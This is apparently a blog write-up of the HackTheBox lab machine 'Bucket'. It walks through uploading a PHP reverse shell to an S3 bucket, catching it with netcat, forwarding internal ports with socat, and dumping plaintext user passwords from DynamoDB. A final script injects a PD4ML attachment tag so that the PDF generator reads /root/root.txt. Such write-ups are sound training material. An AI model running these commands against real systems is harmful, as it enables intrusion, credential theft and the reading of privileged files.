Bucket - [HTB]

Cover Image for Bucket - [HTB]

Table of Contents


    Bucket is a medium-hard HackTheBox machine where you will have to learn AWS buckets in order to upload a reverse shell, then in order to get the user's credentials you will need to learn about AWS DynamoDB so you can retrieve some users and passwords. Finally, you will have to exploit a service running inside a private AWS web service under construction to extract the root flag.


    As always let's start scanning all opening ports in the box.

    kali@kali:$ sudo nmap -sS -p- --open -T5 -n -oN AllPorts.txt
    tarting Nmap 7.91 ( https://nmap.org ) at 2020-10-31 07:19 EDT
    Nmap scan report for
    Host is up (0.046s latency).
    Not shown: 65533 closed ports
    22/tcp open  ssh
    80/tcp open  http

    Then, continue with an exhaustively scan of each port.

    kali@kali:$ sudo nmap -sC -sV -p22,80 -n -oN PortDepth.txt
    22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
    |_  256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
    80/tcp open  http    Apache httpd 2.4.41
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Did not follow redirect to http://bucket.htb/
    Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

    Because there is nothing interesting let's have a look to the web page.


    It seems like an informative page about cybersecurity. Looking inside the code there is a piece of code with a different domain where images are stored.

    <div class="coffee">
    	<img src="http://s3.bucket.htb/adserver/images/bug.jpg" alt="Bug" height="160" width="160">

    Once added the domain to the /etc/hosts file, we can get access to the domain, finding the following page.


    This is because we are getting access to a s3 aws bucket.

    Amazon Simple Storage Service is an object storage service that you can interact using the command line, doing things like uploading files.

    In order to do so, you need to install aws-cli. You can find the aws-cli documentation in this link.

    kali@kali:$ sudo apt-get install awscli -y


    Once installed the program, it must be configured running the following command (It doesn't matter what you write).

    kali@kali:$ aws configure
    AWS Access Key ID []: 1234
    AWS Secret Access Key []: 1234
    Default region name []: 1234
    Default output format []: text

    Then, in order to upload a PHP reverse shell file you need to run the following command (Must be edited before uploading it) :

    aws s3 cp shell.php --endpoint-url http://s3.bucket.htb s3://adserver/

    The cp parameter is to copy and --endpoint-url specify the bucket where the command will be executed.

    After that, you need to put a listening port with netcat and access to the following direction

    kali@kali:$ nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [] from (UNKNOWN) [] 43736
    Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
     16:36:12 up 19:00,  0 users,  load average: 0.09, 0.07, 0.03
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    Privilege Escalation 1

    Before becoming the user roy , I think it is mandatory to upgrade our shell.


    To do so you need to write the following commands:

    python3 -c "import pty; pty.spawn('/bin/bash')"
    stty raw -echo
    export TERM=screen
    export SHELL=/bin/bash
    stty rows 60 columns 235

    No we are able to use Ctrl+c, Ctrl+L and the keyboard arrows.

    Coming back to the machine, we have read permissions in the roy's folder, where there is a folder named project. Having a look inside there is a php file with information about a dynamo data base (Amazon DynamoDB is a NoSQL database).

    www-data@bucket:/home/roy/project$ cat db.php 
    require 'vendor/autoload.php';
    use Aws\DynamoDb\DynamoDbClient;
    use Aws\DynamoDb\Exception\DynamoDbException;
    $client = new Aws\Sdk([
        'profile' => 'default',
        'region'  => 'us-east-1',
        'version' => 'latest',
        'endpoint' => 'http://localhost:4566'
    $dynamodb = $client->createDynamoDb();

    This database is listing in the 4566 port, using netcat we can retrieve all listening ports.

    www-data@bucket:/$ netstat -pluton
    (Not all processes could be identified, non-owned process info
     will not be shown, you would have to be root to see it all.)
    Active Internet connections (only servers)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name     Timer
    tcp        0      0 *               LISTEN      -                    off (0.00/0/0)
    tcp        0      0*               LISTEN      -                    off (0.00/0/0)
    tcp        0      0    *               LISTEN      -                    off (0.00/0/0)
    tcp        0      0*               LISTEN      -                    off (0.00/0/0)
    tcp        0      0*               LISTEN      -                    off (0.00/0/0)
    tcp6       0      0 :::22                   :::*                    LISTEN      -                    off (0.00/0/0)
    tcp6       0      0 :::80                   :::*                    LISTEN      -                    off (0.00/0/0)
    udp        0      0 *                           -                    off (0.00/0/0)

    The port 53 corresponds to a DNS service, 22 to SSH, 80 to Apache, 35109 no clue XD. In order to access to ports 8000 and 4566 from our kali machine I am using socat.

    To upload socat you need to execute these commands.

    Kali@kali:$ nc -lp 4445 < socat 
    www-data@bucket:/tmp$ nc -w 3 4445 > socat
    www-data@bucket:/tmp$ chmod +x socat

    Thanks to socat we are able to redirect all the incoming data from port 4445 to 4566 and we can do the same for port 8000 with port 4446.

    www-data@bucket:/tmp$ ./socat TCP4-LISTEN:4445,fork TCP4: &
    www-data@bucket:/tmp$ ./socat TCP4-LISTEN:4446,fork TCP4: &

    For one side, accessing to http://bucket.htb:4445/ from our kali machine we get this website under construction.

    bucket.htb under construction

    From the other site, using aws cli we can get retrieve all the tables int the site's dynamo database.

    kali@kali:$ aws dynamodb list-tables --endpoint-url http://bucket.htb:4446 
    TABLENAMES users

    Then, we can get all the information inside the users table.

    kali@kali:$ aws dynamodb scan --table-name users --endpoint-url http://bucket.htb:4446
    None    3       3
    PASSWORD        Management@#1@#
    USERNAME        Mgmt
    PASSWORD        Welcome123!
    USERNAME        Cloudadm
    PASSWORD        n2vM-<_K_Q:.Aa2
    USERNAME        Sysadm

    With try and error, the password n2vM-<_K_Q:.Aa2 is also used by roy to login to the machine.

    Privilege Escalation 2

    Now, we can access to the directory bucket-app located in /var/www/.

    Inside the index.php file there is the following php code.

    require 'vendor/autoload.php';
    use Aws\DynamoDb\DynamoDbClient;
            if($_POST["action"]==="get_alerts") {
                    $client = new DynamoDbClient([
                            'profile' => 'default',
                            'region'  => 'us-east-1',
                            'version' => 'latest',
                            'endpoint' => 'http://localhost:4566'
                    $iterator = $client->getIterator('Scan', array(
                            'TableName' => 'alerts',
                            'FilterExpression' => "title = :title",
                            'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                    foreach ($iterator as $item) {
                    passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");

    What the code does is to handle post requests with the name parameter "action" and the value get_alerts, then takes all rows with title "Ransomware" from the table alerts of the dynamoDB. Finally, for each row creates a random HTML file with the contents of the columnc data from the alerts, creating a PDF file in the files directory named as resuld.pdf using p4dml_demo.jar.

    PD4ML is a Java library, which makes possible to create PDF documents from Java and JSP applications using HTML as template language.

    Looking into the PD4ML documentation there is an HTML tag <pd4ml:attachment\> which embeds external resource as PDF attachment.

    In order to retrieve the user flag, you need to write an script to do all the following tasks as soon as possible; because there is a cron job which erase everything from the database and the files folder.

    The script is the following.

    aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url
    aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment src=\"/root/root.txt\" description=\"Root Flag\" icon=\"Paperclip\">"}}' --endpoint-url
    curl -X POST -d "action=get_alerts"
    rm /tmp/result.pdf
    cp /var/www/bucket-app/files/result.pdf /tmp/

    Finally, you must execute the script inside the box, download the resulting pdf, open it and click in the image and obtain the root's flag.